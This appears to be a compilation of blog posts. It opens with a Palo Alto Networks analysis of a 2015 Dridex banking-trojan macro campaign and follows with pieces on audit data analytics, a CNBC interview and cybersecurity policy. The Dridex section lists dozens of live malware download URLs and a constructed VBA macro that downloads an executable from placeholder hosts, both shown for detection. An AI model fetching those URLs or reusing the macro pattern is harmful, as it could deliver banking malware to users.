Dridex Banking Trojan Begins 2015 with a Bang

In October, we called out a series of attacks installing the Dridex Trojan using macros in Microsoft Word documents. Those attacks continued over the last few months, and in the first two weeks of the new calendar year we’ve seen yet another new campaign.

To refresh your memory, Dridex is the latest version of the Bugat/Feodo/Cridex banking Trojan. Its core functionality is to steal credentials for online banking websites so that a criminal can use them to initiate transfers and steal funds. Dridex is currently being distributed through an e-mail campaign that carries a Word document attachment; the document contains a VBA macro which, when it runs, downloads and executes a copy of the Trojan.

While Dridex targets banks all over the world, in October the majority of the e-mails we tracked were destined for the United States, with the United Kingdom a distant second. This time around the UK comes out on top, with over one third of all observed attacks aimed there.

This change in targeting is also reflected in the lures used in each campaign. Many of the most common attachment names refer to BACS (Bankers’ Automated Clearing Services), the system used for bank transfers in the UK. Another group of e-mails claimed to be an invoice from Les Mills UK, a fitness organization; this campaign is likely preying on individuals in the UK who have made New Year’s resolutions to get fit.

In October we had identified just six URLs used by the Word documents to download the Dridex Trojan. In the past two weeks we’ve detected documents using 43 different download locations:

  • 108.59.252.116/mops/pops.php
  • 111.125.170.132/doc/8.exe
  • 159.253.19.113/ord/1.exe
  • 178.77.79.224/mops/pops.php
  • 188.241.116.63/mops/pops.php
  • 192.157.233.28/ord/1.exe
  • 192.227.167.32/mops/pops.php
  • 193.136.19.160/mans/pops.php
  • 194.28.139.100/mans/pops.php
  • 206.72.192.15/mans/pops.php
  • 213.174.162.126/mans/pops.php
  • 213.9.95.58/mans/pops.php
  • 87.106.165.232/mans/pops.php
  • aircraftpolish.com/js/bin.exe
  • betterinnovation.net/modules/mod_arateiclws/cr_7_2711_2.exe
  • cerovski1.net.amis.hr/js/bin.exe
  • curie-hennebont.fr/js/bin.exe
  • dollarbrasil.com.br/444
  • ecovoyage.hi2.ro/js/bin.exe
  • elsy.pwp.blueyonder.co.uk/444
  • fachonet.com/js/bin.exe
  • gofoto.dk/js/bin.exe
  • gv-roth.de/js/bin.exe
  • interativaonline.com/444
  • jasoncurtis.co.uk/js/bin.exe
  • lapiden.com/wp-content/themes/twentytwelve/mss20.exe
  • lapiden.com/wp-content/themes/twentytwelve/mss22.exe
  • lichtblick-tiere.de/js/bin.exe
  • media.mystudio.net/js/bin.exe
  • microinvent.com/js/bin.exe
  • nestorausqui.com/444
  • ngrbook.com/cp/images/digits/blushdw/cr_7_2711_2.exe
  • nubsjackbox.oboroduki.com/js/bin.exe
  • obuwiehurt.com.pl/js/bin.exe
  • paulmartinseo.com/wp-content/themes/twentyten/cr_7_2711_13.exe
  • phaluzan.net.amis.hr/js/bin.exe
  • riccis.homepage.t-online.de/Testseite/js/bin.exe
  • sardiniarealestate.info/js/bin.exe
  • ticklestootsies.com/js/bin.exe
  • walkdesign.com/wp-content/themes/willow/cr7_2711_1.exe
  • weme-systems.de/modules/mod_arateiclws/mss3.exe
  • http://www.isolectra.com.sg/tmp/rk2n1.exe
  • zusso.jp/444

Many of these URLs are hosted on compromised websites, but there is no clear pattern indicating how the attackers are taking control of them. The download URLs themselves, however, fall into clear groups: one relies on the path “/js/bin.exe” on a compromised domain; another on short paths such as “/mops/pops.php”, “/mans/pops.php” or “/ord/1.exe” served directly from an IP address; a third on a bare “/444” path; and the rest drop variously named executables (cr_7_2711_2.exe, mss20.exe and similar) into CMS theme and module directories. These URLs are encoded within the macros included in each file. If you are interested in extracting them yourself, Rodel Mendrez from SpiderLabs wrote a short guide using Python. If you want to take the simpler route, Didier Stevens’ oledump.py has a plug-in that automatically decodes and extracts these URLs.
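As an added illustration (example code written for this page, not the script from Rodel Mendrez’s guide nor the oledump plug-in), the Python below folds the string-building tricks a macro commonly uses to hide a download URL, Chr() concatenation, StrReverse() and split literals, back into plain strings, pulls out every URL, and buckets each one by the path families seen in the list above. The VBA it parses is a constructed sample, not a real Dridex macro; the hosts example.com and 192.0.2.10 and the Fetch() call are placeholders.

```python
import re
from urllib.parse import urlsplit

# Constructed sample VBA macro text (NOT a real Dridex macro). It hides two
# download URLs behind Chr() concatenation, StrReverse() and split string
# literals, which are common VBA obfuscation tricks. Hosts and the Fetch()
# routine are placeholders.
SAMPLE_VBA = r'''
Sub AutoOpen()
    Dim u As String, v As String
    u = Chr(104) & Chr(116) & Chr(116) & Chr(112) & "://" & _
        StrReverse("moc.elpmaxe") & "/js/bin.exe"
    v = "http://" & "192.0.2.10" & "/mops/" & "pops" & ".php"
    Call Fetch(u, "%TEMP%\a.exe")
End Sub
'''

CHR_RE = re.compile(r'Chr\((\d+)\)')
STRREV_RE = re.compile(r'StrReverse\("([^"]*)"\)')
# "a" & "b", optionally across a VBA " _" line continuation
CONCAT_RE = re.compile(r'"([^"]*)"\s*&\s*(?:_\s*)?"([^"]*)"')
STRING_RE = re.compile(r'"([^"]*)"')
URL_RE = re.compile(r'https?://[^\s"\']+')

# Path families observed in the campaign's download-URL list.
FAMILIES = ("/js/bin.exe", "/mops/pops.php", "/mans/pops.php", "/ord/1.exe", "/444")


def deobfuscate(vba):
    """Fold Chr()/StrReverse() calls and literal concatenations into plain literals.

    Limitation: Chr(34) (a double quote) is not escaped, so a macro that builds
    quotes this way would need a real tokenizer rather than these regexes.
    """
    text = CHR_RE.sub(lambda m: '"' + chr(int(m.group(1))) + '"', vba)
    text = STRREV_RE.sub(lambda m: '"' + m.group(1)[::-1] + '"', text)
    while True:  # merge adjacent literals until nothing changes
        merged = CONCAT_RE.sub(lambda m: '"' + m.group(1) + m.group(2) + '"', text)
        if merged == text:
            return text
        text = merged


def extract_urls(vba):
    """Return the unique URLs found in the macro's deobfuscated string literals."""
    found = []
    for literal in STRING_RE.findall(deobfuscate(vba)):
        for url in URL_RE.findall(literal):
            if url not in found:
                found.append(url)
    return found


def classify(url):
    """Bucket a URL (with or without scheme) by the campaign's path patterns."""
    path = urlsplit(url).path
    for family in FAMILIES:
        if path.endswith(family):
            return family
    return "other"


def group_by_family(urls):
    """Map each path family to the URLs that use it."""
    groups = {}
    for url in urls:
        groups.setdefault(classify(url), []).append(url)
    return groups


if __name__ == "__main__":
    for url in extract_urls(SAMPLE_VBA):
        print(f"{classify(url):16} {url}")
```

The same classify() bucketing can be run over proxy logs: a request whose path ends in one of the families above is worth a closer look even when the host is not yet on any list.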

Palo Alto Networks WildFire detects all of these macro-based attacks using our sandbox technology. Others can protect themselves by disabling macros in Microsoft Word. Macro-based malware has been around for well over a decade; most organizations should disable macros by default and enable them only for trusted, ideally digitally signed, documents.

[Palo Alto Networks Blog]

Integrating Data Analytics Into a Risk-Based IT Audit

Although most would agree that internal audit is an assurance function, I like to think of internal auditors as value-added trusted advisors. A given mandate will provide assurance that processes are functioning appropriately; however, the real value lies in identifying areas of improvement that add tangible value back to the organisation. Data analytics has long been my tool of choice for delivering this value effectively and efficiently.

At ISACA’s 2015 North America Computer Audit, Control and Security (CACS) conference, I will be presenting alongside Bob Cuthbertson, COO of CaseWare IDEA Inc., on successful integration of data analytics within a risk-based IT audit universe. As a prelude to our session, I would like to provide examples from my own past work, which I will add to, along with others, during the session on 16 March in Orlando, Florida.

Getting Started—Scoping the Audit Engagement

Understanding the business is the first and most crucial step in the audit process; it determines how much value you can potentially provide to key stakeholders. As shown in scenario 1 below, data analytics can be used before the audit begins as a status indicator of the risks facing an organization. With this information, internal audit can improve audit effectiveness as well, with the ultimate aim of providing value to the organisation.

Scenario 1: Driving the Audit Scope

Areas of Risk Identified:

  • Change Management
  • Project Management

Challenge:  Time limitations allowed only one area of focus for the audit year.
Solution:  High-level analytics of change logs and project management databases uncovered significant internal development projects.
Results:  The System Development Life Cycle (SDLC) process was therefore identified as an area of immediate value to the organization.

Homing in on Insights Gained (Audit Execution)

To save time and resources, the use of data analytics in the planning phase helps develop a greater understanding of where the risk hotspots are. As outlined in scenario 2 below, utilizing 100 percent of the available data enables internal audit to truly focus on, and identify anomalies within, the areas identified as high risk.

Scenario 2: Testing Compliance

Mandate:  Operational efficiency—IT help desk tickets

Challenge:  More than 140,000 tickets were opened and closed during the year.

Solution:  Use data analytics to identify trends to ensure the IT department meets the service level requirements—as delineated in the service level agreement (SLA).

Steps:

  1. Obtain an extract from the ticket management system (Footprints). Confirm data completeness by reconciling the record count shown on screen (in the system) with the CSV dump.
  2. Execute a trend analysis of tickets closed by employee, criticality and category type, and of the elapsed time from “Ticket Open date” to “Ticket Close date.”
  3. Confirm compliance with the SLA.
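As an added worked example (written for this page, not the author’s own analysis or CaseWare IDEA output), the Python below runs the three steps over a constructed ticket extract: reconciling the record count against what the system reports, trending time-to-close by employee and by criticality, and flagging tickets that exceeded a hypothetical SLA. The ticket rows, employee names and SLA thresholds are all invented.

```python
import csv
import io
from collections import defaultdict
from datetime import datetime

# Constructed help desk extract (not real Footprints data). The columns are the
# ones the three steps depend on; dates are "YYYY-MM-DD HH:MM".
TICKET_CSV = """ticket_id,employee,criticality,category,open_date,close_date
1001,alice,High,Access,2014-03-03 09:00,2014-03-03 12:30
1002,bob,Low,Hardware,2014-03-03 10:00,2014-03-07 16:00
1003,alice,Medium,Software,2014-03-04 08:15,2014-03-05 08:45
1004,carol,High,Network,2014-03-04 14:00,2014-03-05 15:30
1005,bob,Low,Software,2014-03-05 11:00,2014-03-06 11:00
1006,carol,Medium,Access,2014-03-06 09:00,2014-03-06 17:00
"""

# Hypothetical SLA: maximum hours from open to close, by criticality.
SLA_HOURS = {"High": 8, "Medium": 24, "Low": 72}
DATE_FMT = "%Y-%m-%d %H:%M"


def load_tickets(csv_text):
    """Parse the extract and compute each ticket's open-to-close time in hours."""
    tickets = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        opened = datetime.strptime(row["open_date"], DATE_FMT)
        closed = datetime.strptime(row["close_date"], DATE_FMT)
        row["hours_open"] = (closed - opened).total_seconds() / 3600
        tickets.append(row)
    return tickets


def is_complete(tickets, on_screen_count):
    """Step 1: the CSV dump must hold exactly the record count the system shows."""
    return len(tickets) == on_screen_count


def trend(tickets, field):
    """Step 2: (ticket count, mean hours to close) per distinct value of `field`."""
    buckets = defaultdict(list)
    for t in tickets:
        buckets[t[field]].append(t["hours_open"])
    return {k: (len(v), sum(v) / len(v)) for k, v in buckets.items()}


def sla_breaches(tickets):
    """Step 3: tickets that took longer than the SLA allows for their criticality."""
    return [t["ticket_id"] for t in tickets
            if t["hours_open"] > SLA_HOURS[t["criticality"]]]


def compliance_rate(tickets):
    """Share of tickets closed within SLA (1.0 means fully compliant)."""
    return 1 - len(sla_breaches(tickets)) / len(tickets)


if __name__ == "__main__":
    tickets = load_tickets(TICKET_CSV)
    print("complete vs. on-screen count of 6:", is_complete(tickets, 6))
    for field in ("employee", "criticality", "category"):
        print(field, trend(tickets, field))
    print("SLA breaches:", sla_breaches(tickets),
          "compliance rate:", compliance_rate(tickets))
```

On a real extract the on-screen count is typed in from the system, and the trend() output per employee is the raw material for the performance dashboard described in the results below; the breach list is the evidence for step 3.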

Results:  The analytics showed that the IT group was in compliance with the agreed-upon SLA. Encouragingly, management was very interested in our data analysis, which led to the development of a dashboard for both operational efficiency (which the director was tracking manually at the time) and employee performance. The employee performance KPIs were then linked to the respective annual evaluations, giving a more objective measure of each help desk employee’s core performance.

Reporting Results

The insights found during audit execution are what allow you to create a report that provides value to the organization. They are the first step toward a tangible root cause analysis and toward shedding light on the compliance and governance failures that matter most to companies.

The reporting phase is crucial when it comes to providing the added value for which we strive. If you have performed your audit effectively, the report will include only validated control deficiencies. The use of data analytics throughout the audit process should leave time to report on exact findings, highlight root causes and provide tangible recommendations. Furthermore, data analytics, and data visualisation in particular, can convey large amounts of data and information in a single image. I always remind myself that information is what the other party receives and not what I say. Therefore, using data visualisation to ensure the identified efficiencies get across to the reader is yet another way in which data analytics helps me become the value-added trusted advisor I strive to be.

Conclusion

We have been using data analytics and attaining value by operating in a systematic and structured manner. We maximize our investment through these efficiencies and are able to provide stakeholders with the answers to questions before they even have them. This can and will continue to increase our value as internal auditors and trusted advisors to the business. During the session at North America CACS in March, I will be expanding on the processes behind these scenarios along with more examples using analytics tactics and visualisation methods. I hope to see you there!

Seren Dagdeviren, CPA, CIA
Manager, Internal Audit, Ivanhoé Cambridge
Montreal, QC, Canada

Seren Dagdeviren will present “Building Momentum” at 2015 North America CACS in Orlando, Florida, USA, 16-18 March 2015. For information and to register, visit www.isaca.org/northamericacacs2015.

[ISACA]

CNBC Talks to Cyber Threat Alliance About Taking the Fight to Cyberattackers

Today at Palo Alto Networks HQ we hosted the four co-founders of the Cyber Threat Alliance, including our own Mark McLaughlin, for a live discussion on CNBC’s Squawk Alley focused squarely on how collaboration between security companies is helping customers in the ongoing battle against cyberattackers. Mark and his fellow co-founders also touched on the latest cybersecurity legislation to come out of Washington.

Watch the full interview here, learn more about the Cyber Threat Alliance here and check out a few shots of the behind-the-scenes action at HQ this morning.

[Palo Alto Networks Blog]

Will Government Be An Effective Cybersecurity Leader or Passive Bystander?

Our industry has for many years been discussing the need for updates to critical public electronic communications laws and policies; reductions in corporate liability for intelligence sharing; national data breach legislation to replace the morass of US state laws; and increases in funding for cybersecurity education, research and standards.

There are two milestones that make the transition from conversation and confusion to clear and decisive action so important now. The first is that we’ve reached critical mass in both corporate and consumer understanding of the importance of cybersecurity. While mega breaches are not new, for most Americans the impact in the past has largely been limited to the inconvenience of swapping credit card numbers, and attention quickly waned. This year, consumers and corporate citizens at all levels experienced multiple breaches that created a saga of compounding and widespread impact, from credit cards to corporate espionage to threats of physical terrorism, and sustained attention for months.

The second, more troubling factor is escalation. While some of the nation-state saber-rattling may be just that, the ease with which cybercriminals compromised a significant footprint of the retail and digital advertising sector, and the aggressive and calculated manner in which they compromised and then meted out damage on Sony and other very mature organizations, is a major milestone and an unsettling indicator of things to come.

It is critical that we begin to disrupt the cyber adversaries and their economic and political incentives. This disruption requires a concerted effort, and the government can either play a modern and effective leadership role or be a passive bystander commenting on the state of affairs. In the State of the Union speech, President Barack Obama will provide a clear indicator of which direction the US government is heading on this issue.

ISACA is seeking to address cybersecurity challenges, including the global skills gap and the need for guidance, in 2015 and beyond. Given the critical skills gap in cybersecurity and the need for greater industry engagement and peer conversations around security governance, cyber career progression, standards, training curricula and professional certification, ISACA’s Cybersecurity Nexus (CSX) plays a pivotal role in bringing practitioners together worldwide and creating a launchpad for the cybersecurity experts and solutions of the future.

Eddie Schwartz, CISA, CISM, president of WhiteOps and chair of ISACA’s Cybersecurity Task Force

[ISACA]
